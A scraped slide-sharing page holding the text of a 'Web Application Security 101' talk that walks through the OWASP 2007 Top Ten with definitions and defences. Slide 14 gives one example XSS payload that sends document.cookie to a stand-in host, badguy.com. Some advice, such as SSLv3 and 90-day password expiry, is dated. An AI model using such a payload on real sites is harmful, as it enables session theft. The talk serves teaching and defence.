A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Recently uploaded (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 

Web Application Security 101

  • 1.
  • 2. About us:  Vaibhav Gupta  Current: Security Researcher @ Adobe  Past: Senior Information Security Engg. @ Fortune 500  Vishal Asthana  Regional Director – Security Compass (India Ops)  Web Application Security, Secure SDLC, Agile Security  Sandeep Singh  Current: Security Analyst @ Dell  Past: Independent Security Consultant  And…we are Delhi chapter leaders for Null – The Open Security Community (What is this??) 2
  • 3. null – the open Security community  Open Security Community (Not for Profit Registered)  Local chapters in various cities  Comprised of Security Professionals & Enthusiasts  Knowledge & Information Sharing Platform  ** Not a Training Institution  ** Not a bunch of hackers/anarchists always talking about breaking systems  ** Not an underground community 3
  • 4. Participate  How can I become a member of null?  Join Mailing List (http://groups.google.com/group/null-co-in)  Participate in Discussion on Mailing Lists  Attend Monthly meets  How do I participate?  Attend/Speak at Monthly meets  Conduct full day workshops(Humla/Bachaav/Puliya)  Spread the word  4
  • 5. Introduction  Purpose of Session: - Provide Overview Web Application Security Threats and Defense  Using the Open Web Application Security Project (OWASP) “2007 Top Ten List,” we will: - Define the vulnerabilities - Illustrate the Web Application vulnerabilities - Explain how to protect against the vulnerabilities 5
  • 6. Credits and References  2 Documents copyrighted by the Open Web Application Security Project, and freely downloaded from www.owasp.org.  OWASP 2007 Top Ten is titled "The Ten Most Critical Web Application Security Vulnerabilities" 2007 update.  http://www.owasp.org/index.php/Top_10_2007  The OWASP Guide is titled "A Guide to Building Secure Web Applications" 2.0.1 Black Hat Edition, July 2005  http://www.owasp.org/index.php/OWASP_Guide_Project 6
  • 7. What is Web Application Security?  Not Network Security  Securing the “custom code” that drives a web application  Securing libraries  Securing backend systems  Securing web and application servers  Network Security Mostly Ignores the Contents of HTTP Traffic  Firewalls, SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening 7
  • 8. http://aspectsecurity.com/topten What is an OWASP?  Open Web Application Security Project  http://www.owasp.org  Open group focused on understanding and improving the security of web applications and web services!  Hundreds of volunteer experts from around the world  Top Ten Project  Raise awareness with a simple message  Lead by Aspect Security
  • 9. How Bad Is It?  Bad 9 **Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/ (Server-side Include)
  • 10. How Bad Is It?  Pretty Bad 10 Threat Classification No. of Vulns Vuln. % No. of Sites % of Vuln. Sites Brute Force 66 0.04% 66 0.21% Content Spoofing 663 0.45% 218 0.69% Cross Site Scripting 100,059 67.59% 26,531 84.57% Directory Indexing 292 0.20% 168 0.54% HTTP Response Splitting 4,487 3.03% 3,062 9.76% Information Leakage 20,518 13.86% 4,924 15.70% Insufficient Authentication 84 0.06% 1 0.00% Insufficient Authorization 23 0.02% 4 0.01% Insufficient Session Expiration 46 0.03% 1 0.00% OS Commanding 143 0.10% 44 0.14% Path Traversal 426 0.29% 374 1.19% Predictable Resource Location 651 0.44% 173 0.55% SQL Injection 19,607 13.25% 8,277 26.38% SSI Injection 950 0.64% 298 0.95% XPath Injection 14 0.01% 6 0.02% 148,029 100.00% 44,147 **Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/ - 31,373 Sites Tested
  • 11. OWASP Top Ten List A1. Cross-Site Scripting (XSS) A2. Injections Flaws A3. Malicious File Execution A4. Insecure Direct Object Reference A5. Cross Site Request Forgery (CSRF) A6. Information Leakage & Improper Error Handling A7. Broken Authentication & Session Management A8. Insecure Cryptographic Storage A9. Insecure Communications A10. Failure to Restrict URL Access 11
  • 12. Your Code is Part of Your Security Perimeter 12 Firewall Hardened OS Web Server App Server Firewall Databases LegacySystems WebServices Directories HumanResrcs Billing Custom Developed Application Code APPLICATION ATTACK You can’t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks NetworkLayerApplicationLayer Your security “perimeter” has huge holes at the application layer
  • 13. A1. Cross-Site Scripting (XSS) Flaws OWASP Definition XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc. 13
  • 14. A1. Cross-Site Scripting (XSS) Attacks 3 Categories of XSS attacks:  Stored - the injected code is permanently stored (in a database, message forum, visitor log, etc.)  Reflected - attacks that are reflected take some other route to the victim (through an e-mail message, or bounced off from some other server)  DOM injection – Injected code manipulates sites javascript code or variables, rather than HTML objects. Example Comment embedded with JavaScript comment=“Nice site! <SCRIPT> window.open( http://badguy.com/info.pl?document.cookie </SCRIPT> 14
  • 15. A1. Cross-Site Scripting (XSS)  Occurs when an attacker can manipulate a Web application to send malicious scripts to a third party.  This is usually done when there is a location that arbitrary content can be entered into (such as an e-mail message, or free text field for example) and then referenced by the target of the attack.  The attack typically takes the form of an HTML tag (frequently a hyperlink) that contains malicious scripting (often JavaScript).  The target of the attack trusts the Web application and thus XSS attacks exploit that trust to do things that would not normally be allowed.  The use of Unicode and other methods of encoding the malicious portion of the tag are often used so the request looks less suspicious to the target user or to evade IDS/IPS. 15
  • 16. XSS - Protection Protect your application from XSS attacks  Filter output by converting text/data which might have dangerous HTML characters to its encoded format:  '<' and '>' to '&lt;' and '&gt;’  '(' and ')' to '&#40;' and '&#41;’  '#' and '&' to '&#35;' and '&#38;‘  Recommend filtering on input as much as possible. (some data may need to allow special characters.) 16
  • 17. A2. Injections Flaws OWASP Definition: Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data. 17
  • 18. A2. Injections Flaws Some common types of command injection flaws include:  SQL injection (malicious calls to backend databases via SQL), using shell commands to run external programs  Using system calls to in turn make calls to the operating system. Any Web application that relies on the use of an interpreter has the potential to fall victim to this type of flaw 18
  • 19. A2. Injections Flaws: Protection  Use language specific libraries to perform the same functions as shell commands and system calls  Check for existing reusable libraries to validate input, and safely perform system functions, or develop your own.  Perform design and code reviews on the reusable libraries to ensure security. Other common methods of protection include:  Use stored Procedures  Data validation (to ensure input isn't malicious code),  Run commands with very minimal privileges  If the application is compromised, the damage will be minimized. 19
  • 20. A3. Malicious File Execution OWASP Definition: Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users. 20
  • 21. A3. Malicious File Execution  Applications which allow the user to provide a filename, or part of a filename are often vulnerable if input is not carefully validated.  Allowing the attacker to manipulate the filename may cause application to execute a system program or external URL.  Applications which allow file uploads have additional risks  Place executable code into the application  Replace a Session file, log file or authentication token 21
  • 22. A3. Malicious File Execution Protection  Do not allow user input to be used for any part of a file or path name.  Where user input must influence a file name or URL, use a fully enumerated list to positively validate the value.  File uploads have to be done VERY carefully.  Only allow uploads to a path outside of the webroot so it can not be executed  Validate the file name provided so that a directory path is not included.  Implement or enable sandbox or chroot controls which limit the applications access to files. 22
  • 23. A4. Insecure Direct Object Reference OWASP Definition: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization. 23
  • 24. A4. Insecure Direct Object Reference  Applications often expose internal objects, making them accessible via parameters.  When those objects are exposed, the attacker may manipulate unauthorized objects, if proper access controls are not in place.  Internal Objects might include  Files or Directories  URLs  Database key, such as acct_no, group_id etc.  Other database object names such as table name 24
  • 25. A4. Insecure Direct Object Reference Protection  Do not expose direct objects via parameters  Use an indirect mapping which is simple to validate.  Consider using a mapped numeric range, file=1 or 2 …  Re-verify authorization at every reference.  For example: 1. Application provided an initial lists of only the authorized options. 2. When user’s option is “submitted” as a parameter, authorization must be checked again. 25
  • 26. A5. Cross Site Request Forgery (CSRF) OWASP Definition: A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks. 26
  • 27. A5. Cross Site Request Forgery (CSRF)  Applications are vulnerable if any of following:  Does not re-verify authorization of action  Default login/password will authorize action  Action will be authorized based only on credentials which are automatically submitted by the browser such as session cookie, Kerberos token, basic authentication, or SSL certificate etc. 27
  • 28. A5. Cross Site Request Forgery (CSRF) Protection  Eliminate any Cross Site Scripting vulnerabilities  Not all CSRF attacks require XSS  However XSS is a major channel for delivery of CSRF attacks  Generate unique random tokens for each form or URL, which are not automatically transmitted by the browser.  Do not allow GET requests for sensitive actions.  For sensitive actions, re-authenticate or digitally sign the transaction. 28
  • 29. A6. Information Leakage & Improper Error Handling OWASP Definition: Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data or conduct more serious attacks. 29
  • 30. Improper Error Handling: Protection  Prevent display of detailed internal error messages including stack traces, messages with database or table names, protocols, and other error codes. (This can provide attackers clues as to potential flaws.)  Good error handling systems should always enforce the security scheme in place while still being able to handle any feasible input.  Provide short error messages to the user while logging detailed error information to an internal log file.  Diagnostic information is available to site maintainers  Vague messages indicating an internal failure provided to the users  Provide just enough information to allow what is reported by the user to be able to linked the internal error logs. For example: System Time- stamp, client IP address, and URL 30
  • 31. Information Leakage - Example  Sensitive information can be leaked very subtlety  Very Common Example - Account Harvesting  App. responds differently to a valid user name with an invalid password, then it would to a invalid user name  Web application discloses which logins are valid vs. which are invalid, and allows accounts to be guessed and harvested.  Provides the attacker with an important initial piece of information, which may then be followed with password guessing.  Difference in the Web App response may be:  Intentional (Easier to for users to tell then the account name is wrong)  Different code included in URL, or in a hidden field  Any minor difference in the HTML is sufficient  Differences in timing are also common and may be used! 31
  • 32. Information Leakage: Protections  Ensure sensitive responses with multiple outcomes return identical results  Save the the different responses and diff the html, the http headers & URL.  Ensure error messages are returned in roughly the same time or consider imposing a random wait time for all transactions to hide this detail from the attacker. 32
  • 33. A7. Broken Authentication and Session Management OWASP Definition: Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users’ identities. 33
  • 34. Session Management  HTTP/S protocol does not provide tracking of a users session.  Session tracking answers the question:  After a user authenticates how does the server associate subsequent requests to the authenticated user?  Typically, web application vendors provide a built-in session tracking, which is good if used properly.  Often developers will make the mistake of inventing their own session tracking. 34
  • 35. Session Management (Session IDs) A Session ID  Unique to the User  Used for only one authenticated session  Generated by the server  Sent to the client as  Hidden variable,  HTTP cookie,  URL query string (not a good practice)  The user is expected to send back the same ID in the next request. 35
  • 36. Session Management (Session Hijacking)  Session ID is disclosed or is guessed.  An attacker using the same session ID has the same privileges as the real user.  Especially useful to an attacker if the session is privileged.  Allows initial access to the web application to be combined with other attacks. 36
  • 37. Session Management: Protection  Use long complex random session ID that cannot be guessed.  Protect the transmission and storage of the Session ID to prevent disclosure and hijacking.  A URL query string should not be used for Session ID or any User/Session information  URL is stored in browser cache  Logged via Web proxies and stored in the proxy cache 37
  • 38. Session Management: Protection  Entire session should be transmitted via HTTPS to prevent disclosure of the session ID. (not just the authentication)  Avoid or protect any session information transmitted to/from the client.  Session ID should expire and/or time-out on the Server when idle or on logout.  Client side cookie expirations useful, but should not be trusted.  Consider regenerating a new session upon successful authentication or privilege level change. 38
  • 39. Broken Account Management Even valid authentication schemes can be undermined by flawed account management functions including:  Account update  Forgotten password recovery or reset  Change password, and other similar functions 39
  • 40. Broken Account and Session Management: Protection  Password Change Controls - require users to provide both old and new passwords  Forgotten Password Controls - if forgotten passwords are emailed to users, they should be required to re-authenticate whenever they attempt to change their email address.  Password Strength - require at least 7 characters, with letters, numbers, and special characters both upper case and lower case.  Password Expiration - Users must change passwords every 90 days, and administrators every 30 days. 40
  • 41. Broken Account and Session Management: Protection  Password Storage - never store passwords in plain text. Passwords should always be stored in either hashed (preferred) or encrypted form.  Protecting Credentials in Transit - to prevent "man-in-the-middle" attacks the entire authenticated session / transaction should be encrypted SSLv3 or TLSv1  Man-in-the-middle attacks - are still possible with SSL if users disable or ignore warnings about invalid SSL certificates.  Replay attacks - Transformations such as hashing on the client side provide little protection as the hashed version can simply be intercepted and retransmitted so that the actual plain text password is not needed. 41
  • 42. A8. Insecure Cryptographic Storage OWASP Definition: Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud. 42
  • 43. A8. Insecure Cryptographic Storage  The majority of Web applications in use today need to store sensitive information (passwords, credit card numbers, proprietary information, etc.) in a secure fashion.  The use of encryption has become relatively easy for developers to incorporate.  Proper utilization of cryptography, however, can remain elusive by developers overestimating the protection provided by encryption, and underestimating the difficulties of proper implementation and protecting the keys. 43
  • 44. Insecure Cryptographic Storage: Common Mistakes  Improper/insecure storage of passwords, certifications, and keys  Poor choice of algorithm  Poor source of randomness for initialization vectors  Attempting to develop a new encryption scheme "in house” (Always a BAD idea)  Failure to provide functionality to change encryption keys 44
  • 45. Insecure Cryptographic Storage: Protection  Avoiding storing sensitive information when possible  Use only approved standard algorithms  Use platform specific approved storage mechanisms  Ask, read and learn about coding Best Practices for your platform  Careful review of all system designs  Source code reviews 45
  • 46. A9. Insecure Communications OWASP Definition: Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications. 46
  • 47. Insecure Communications  Failure to encrypt network traffic leaves the information available to be sniffed from any compromised system/device on the network.  Switched networks do not provide adequate protection. 47
  • 48. Insecure Communications: Protection  Use SSL/TLS for ALL connections that are authenticated or transmitting sensitive information  Use SSL/TLS for mid-tier and internal network communications between Web Server, Application and database.  Configure Desktop Clients and Servers to ensure only SSLv3 and TLSv1 are used with strong ciphers.  Use only valid trusted SSL/TLS certificates and train users to expect valid certificates to prevent Man-in-the- Middle attacks. 48
  • 49. A10. Failure to Restrict URL Access OWASP Definition: Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. 49
  • 50. A10. Failure to Restrict URL Access  When the application fails to restrict access to administrative URLs, the attacker can access normally unauthorized areas by type in the URL’s into the browser.  Surprisingly common, for example:  add_account_form.php - checks for admin access before displaying the form.  Form then posts to add_acct.php which does the work, but doesn’t check for admin privileges!  Consistent URL access control has to be carefully designed. 50
  • 51. A10. Failure to Restrict URL Access : Protection Start Early!  Create an application specific security policy during the requirements phase.  Document user roles as well as what functions and content each role is authorized to access.  Specifying access requirements up front allows simplification of the design  If your access control is not simple it won't be secure. 51
  • 52. A10. Failure to Restrict URL Access: Protection Test Thoroughly!  Conduct extensive regression testing to ensure the access control scheme cannot be bypassed  Test all invalid access attempts as well as valid access.  Don't follow the normal application flow.  Verify that all aspects of user management have been taken under consideration including scalability and maintainability. 52
  • 53. Summary  Application Security starts with the Architecture and Design  Security can’t be added on later without re-designing and rewriting  Custom code often introduces vulnerabilities  Application vulnerabilities are NOT prevented by traditional security controls.  Don’t invent your own security controls  Design, Design, Design, code, test, test, test 53